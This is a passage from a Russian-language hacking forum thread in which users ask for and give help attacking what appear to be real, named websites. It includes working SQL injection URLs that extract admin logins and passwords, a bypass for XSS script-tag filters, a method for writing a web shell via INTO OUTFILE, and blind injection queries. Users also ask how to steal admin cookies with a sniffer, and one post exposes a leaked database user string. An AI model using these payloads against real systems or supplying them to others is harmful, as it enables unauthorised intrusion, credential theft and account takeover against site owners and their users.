Как крутить при таком случае: Code: http://www.textsongs.ru/search/?name=%27 Вот так! 5.0.77-log: peoplesru:[email protected]:redhat-linux-gnu
Вопрос: Чтобы угнать ак админа нужно спирить у его куки, чтобы забрать куки нужно снифер, чтобы снифер заберал куки нужно xss уязвимость, чтобы найти уязвимость нужно посетить сайт античат. Я все правельно понял? или здесь чтото нетак? И как поподробней использувать xss со снифером если можно ссилки на мануалы
http://finclub.perm.ru/?show=561064292&news_id=-815805698+union+select+1,2,user(),4,version(),6,7,8 не могу подобрать таблицы. 4 ветка.
на сайте имеется XSS проходят подставки типа <b>hack</b> и пр. а <script>alert('hack')</script> не канает, как дальше двигать подскажите
Смотри что как фильтруется, поиграй символами, я пару раз видел фильтры, которые вырезают <script>, спасало что-то типа <scr<script>ipt> http://forum.antichat.ru/thread20140.html советую к ознакомлению
podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+ ili kak voobshe delat create table cherez injekciu, zaranee spasibo
pomogite plz eshe s takoi situaciei: esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat: site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+
количество полей, используемых в запросе требуется найти для составления самого запроса, собственно. чтобы для сервера он был верным. в случае с INTO OUTFILE не нужно искать только принтабельные поля, т.к. мы вводим данные, а не выводим и можем сделать это через любое поле.
Логин и пасс админа. Code: http://www.magazin.seti.ee/modules/Board/index.php?pa=view&cid=78+limit+0+union+select+1,2,uname,pass,5,6,7,8,9,10,11+from+m_seti_users+limit+0,1%23
Я пожалуй процитирую первый пост: Здесь не центр первой помощи, и если кто-то хочет найти статью, мануал, фак, видео, заметку ЮЗАЙТЕ ПОИСК! Здесь не школьный кабинет, в котором вам будут разжевывать детально как что-то использовать, ВАМ МОГУТ ПОМОЧЬ, но за вас НИКТО НИЧЕГО ДЕЛАТЬ НЕ БУДЕТ И НЕ ДОЛЖЕН. Обращусь к людям кто отвечает на вопросы, я лично Вам очень благодарен, прекрасно понимаю, что значит грамотно и правильно объяснить задающему вопрос, ответ так, что бы он понял, но пожалуйста, повторюсь, пожалуйста, не решайте их проблемы за них, натолкните их на мысль, на правильное направление, но не давайте НИКОМУ готовых решений, потому, что люди этим пользуются, и не понимают, что они делают, и потом каждый раз приходят в эту тему и умоляют что бы за них кто-то подумал и сделал. Обращусь к людям кто задает вопрос, будьте так любезны. перед тем как задать вопрос, используйте поиск по форуму, пробегитесь глазами по заголовкам прикрепленных тем, в большинстве случаев ответ на ваш вопрос уже дан, даже поговорка есть "семь раз отмерь, один отрежь", и действительно лучше самому семь раз подумать, и решить проблему, тем самым повысив свой боевой скил, чем каждый раз спрашивать одно и тоже.
Помогите понять, в чем причина ошибки? Так инъекция срабатывает http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1,1))>=100,1,0)/* но если подставить select перед user() http://site.ru/index.php?a=50+and+1=if(ascii(substring((SELECT user()),1,1))>=100,1,0)/* то выдает ошибку Может из-за версии mysql 3.23.44 ?
Потому что (SELECT user()) будет является подзапросом, которые появились с версии 4.1. Так что да, ты прав, дело в версии.
Спасибо Из-за версии не получается так же подставить UNION SELECT Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
есть скуля Code: http://www.vgtrk.com/rnews.html?sid=86&id=4716 стоит oracle подскажите как вывести таблицы и колонки?
